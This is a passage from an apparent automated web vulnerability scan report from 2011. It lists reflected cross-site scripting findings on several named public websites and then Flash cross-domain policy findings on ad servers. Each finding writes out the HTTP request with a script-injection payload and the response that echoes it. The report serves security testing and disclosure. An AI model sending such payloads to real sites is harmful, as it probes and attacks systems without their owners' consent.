ETag: "3e44fe57bd9f1ca7ae2413ad405470b5"
Cache-Control: no-cache
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+he7kp7sk7c48bgofxgtgaayor1ghp%0A%3Avisit_start_time%3A+2011-04-02+12%3A44%3A41.415141+%2B00%3A00%0A%3Alast_page_load%3A+2011-04-02+12%3A44%3A41.415143+%2B00%3A00%0A; path=/; expires=Wed, 02-Apr-2036 12:44:41 GMT
Set-Cookie: vrid=e7021120-3f54-012e-d795-00237da0b95e; domain=.yellowpages.com; path=/; expires=Sat, 02-Apr-2016 12:44:41 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlMDU2NjM2ZjQwZTU5NzkxM2ZmODBhZDg1OTkwOWNhYTM6E2RleF9zZXNzaW9uX2lkSSIpZTcwMzkwNjAtM2Y1NC0wMTJlLWQ3OTYtMDAyMzdkYTBiOTVlBjoGRUY%3D--9e7ac88334df5357779cb76d6b268bfc634f7ddf; path=/; HttpOnly
Set-Cookie: b=10010; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-e6a5db50-3f54-012e-19bb-00237da0b95e
Expires: Sat, 02 Apr 2011 12:44:40 GMT
Content-Length: 322976

<!DOCTYPE html>
<html>
<head>

<title>C496d<Img Src=A Onerror=Alert(1)>63985e825a0 - YP.COM</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="C496d&lt;Img Sr
...[SNIP]...
<h3 class="title">C496d<Img Src=A Onerror=Alert(1)>63985e825a0 Near You</h3>
...[SNIP]...
6.111. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb5b"><script>alert(1)</script>8beaa66c83f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icobbb5b"><script>alert(1)</script>8beaa66c83f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yourdictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:58:33 GMT
Server: Apache
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=5184000
Expires: Wed, 01 Jun 2011 13:58:33 GMT
X-LTK-Server: yd-ec2-www
Content-Type: text/html
Content-Length: 8919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://www.yourdictionary.com/favicon.icobbb5b"><script>alert(1)</script>8beaa66c83f" />
...[SNIP]...
6.112. http://www.kcom.com/contact-us/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b99b"><script>alert(1)</script>ca9c0d3513d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=4b99b"><script>alert(1)</script>ca9c0d3513d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749251; expires=Sun, 01-Apr-2012 14:00:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:00:51 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" id="00N300000055kEx" name="00N300000055kEx" title="Web-to-lead URL" value="KCOM Site - http://www.google.com/search?hl=en&q=4b99b"><script>alert(1)</script>ca9c0d3513d - ">
...[SNIP]...
6.113. http://www.canada.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.canada.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1d63'%3ba353fa99bdc was submitted in the REST URL parameter 1. This input was echoed as f1d63';a353fa99bdc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /f1d63'%3ba353fa99bdc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.canada.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www2.canada.com/f1d63';a353fa99bdc/index.html
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 13:41:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:41:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 3579

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www2.canada.com/f1d63';a353fa99bdc/index.html">here</a>.</h2>
</body></html>
<form name="frmPage" method="po
...[SNIP]...
-
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName='/canada/www.canada.com/f1d63';a353fa99bdc/index.html';
s.server=window.location.hostname.toLowerCase();
s.channel='Canada';
s.pageType='';
s.p
...[SNIP]...
6.114. http://www.multiply.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49add"style%3d"x%3aexpression(alert(1))"0c2a6539db2 was submitted in the REST URL parameter 1. This input was echoed as 49add"style="x:expression(alert(1))"0c2a6539db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico49add"style%3d"x%3aexpression(alert(1))"0c2a6539db2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1832OFBpGXmYZEphWmxtBesEf7vWbDUBZQ49XYidYzK4w%3d%3d:iczp3haayzcooqqmczt3pjm; domain=multiply.com; path=/
Set-Cookie: session=1301751465:1301751465:1301751465:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico49add"style="x:expression(alert(1))"0c2a6539db2
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 1245

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1832OFBpGXmYZEphWmxtBesEf7vWbDUBZQ49XYidYzK4w%3d%3d:iczp3haayzcooqqmcz
...[SNIP]...
<A HREF="http://multiply.com/favicon.ico49add"style="x:expression(alert(1))"0c2a6539db2">
...[SNIP]...
6.115. http://www.multiply.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff3a1<script>alert(1)</script>1f3e33e8e25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX18sHkOwl6s9LDVYxCCmwXWdqKgJOM5Lx-aN.bAm4s-ZzA%3d%3d:0bp8odaayycooqqmczt3pjm; domain=multiply.com; path=/
Set-Cookie: session=1301751465:1301751465:1301751465:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 1245

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX18sHkOwl6s9LDVYxCCmwXWdqKgJOM5Lx-aN.bAm4s-ZzA%3d%3d:0bp8odaayycooqqmcz
...[SNIP]...
res=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
...[SNIP]...
6.116. http://www.multiply.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f694<script>alert(1)</script>3af9c4679e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 757

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
...[SNIP]...
6.117. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c6c"><script>alert(1)</script>c18b021cdc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:31 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1">
...[SNIP]...
6.118. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5a1e2><script>alert(1)</script>0856dee6b4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:31 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...
6.119. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9fa44><script>alert(1)</script>ab167bca6cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...
6.120. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd1a5"><script>alert(1)</script>df47f8a83f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1">
...[SNIP]...
6.121. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3412a<script>alert(1)</script>af689436fa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?3412a<script>alert(1)</script>af689436fa3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:05:57 GMT
Location: http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 249

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1">http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1</a>
...[SNIP]...
6.122. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39dc7"><script>alert(1)</script>63b1fa46103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:05:57 GMT
Location: http://townhall.com/favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 253

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1">http://townhall.com/favicon.ico?39dc7"><sc
...[SNIP]...
7. Flash cross-domain policy  previous  next
There are 550 instances of this issue:

7.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sat, 02 Apr 2011 12:56:49 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.2. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 03:31:36 GMT
Expires: Thu, 31 Mar 2011 03:30:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 37531
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
7.3. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 11:30:43 GMT
Expires: Thu, 31 Mar 2011 11:30:14 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5168
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
7.4. http://smp.adviva.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /crossdomain.xml

Issue detail

